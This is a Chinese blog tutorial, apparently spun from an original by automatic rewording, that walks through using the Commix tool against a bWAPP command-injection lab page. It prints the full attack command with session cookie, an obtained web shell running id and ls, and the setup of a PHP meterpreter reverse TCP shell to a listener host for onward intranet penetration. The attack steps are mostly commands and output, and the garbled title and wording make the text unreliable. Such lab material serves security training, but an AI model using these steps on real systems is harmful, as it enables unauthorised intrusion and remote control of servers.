首页 » PHP教程 » php敕令注入破绽技巧_Kali Linux渗透对象八系统敕令注入马脚对象 – Commix运用

php敕令注入破绽技巧_Kali Linux渗透对象八系统敕令注入马脚对象 – Commix运用

访客 2024-12-09 0

扫一扫用手机浏览

文章目录 [+]

四、Commix如何利用?

个中的特定信息如Cookie,可通过浏览器调试工具或第三方工具获取!

~# commix --url "http://127.0.0.1/bWAPP/commandi.php" --cookie="acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=mq78064h3p2b00n4toerk7ana1; security_level=0" --data="target=www.nsa.gov&form=submit"

php敕令注入破绽技巧_Kali Linux渗透对象八系统敕令注入马脚对象 – Commix运用

讯问是否想要一个shell 输入Y 的到shell

php敕令注入破绽技巧_Kali Linux渗透对象八系统敕令注入马脚对象 – Commix运用
(图片来自网络侵删)

[?] Do you want a Pseudo-Terminal shell? [Y/n] > y

Pseudo-Terminal (type '?' for available options)

commix(os_shell) >

得到shell

commix(os_shell) > pwd

/owaspbwa/bwapp-git/bWAPP

commix(os_shell) > id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

commix(os_shell) > ls -ll

可以进行反弹shell 结合metasploit 进行内网渗透

commix(os_shell) > reverse_tcp

commix(reverse_tcp) > set LHOST 192.168.120.101 """(msf机器)

LHOST => 192.168.120.101

commix(reverse_tcp) > set LPORT 4444

LPORT => 4444

---[ Reverse TCP shells ]---

Type '1' to use a netcat reverse TCP shell.

Type '2' for other reverse TCP shells.

commix(reverse_tcp) > 2

---[ Unix-like reverse TCP shells ]---

Type '1' to use a PHP reverse TCP shell.

Type '2' to use a Perl reverse TCP shell.

Type '3' to use a Ruby reverse TCP shell.

Type '4' to use a Python reverse TCP shell.

Type '5' to use a Socat reverse TCP shell.

Type '6' to use a Bash reverse TCP shell.

Type '7' to use a Ncat reverse TCP shell.

---[ Meterpreter reverse TCP shells ]---

Type '8' to use a PHP meterpreter reverse TCP shell.

Type '9' to use a Python meterpreter reverse TCP shell.

Type '10' to use a Windows meterpreter reverse TCP shell.

Type '11' to use the web delivery script.

commix(reverse_tcp_other) > 8

[] Generating the 'php/meterpreter/reverse_tcp' payload... [ SUCCEED ]

[] Type "msfconsole -r /usr/share/commix/php_meterpreter.rc" (in a new window). #复制 启动msf

[] Once the loading is done, press here any key to continue... #按下确定键就可进行在msf吸收到反弹的shell

[+] Everything is in place, cross your fingers and wait for a shell!

Commix利用总结如下:

1.浏览器访问http://127.0.0.1 /bWAPP/commandi.php

2.提交数据 通过抓包工具截取 url cookie data数据

3.用commix 工具指定链接并进入后台

commix -- url "http://127.0.0.1 /bWAPP/commandi.php" --data="target=www.nsa.gov&form=submit" --cookie "+++++++"

亲爱的同学,我们将持续分享Kali与编程技巧,欢迎关注我们哦!
点击理解更多,还有更多Kali与编程技巧,等你来学!
标签:

相关文章

«    2024年12月    »
1
2345678
9101112131415
16171819202122
23242526272829
3031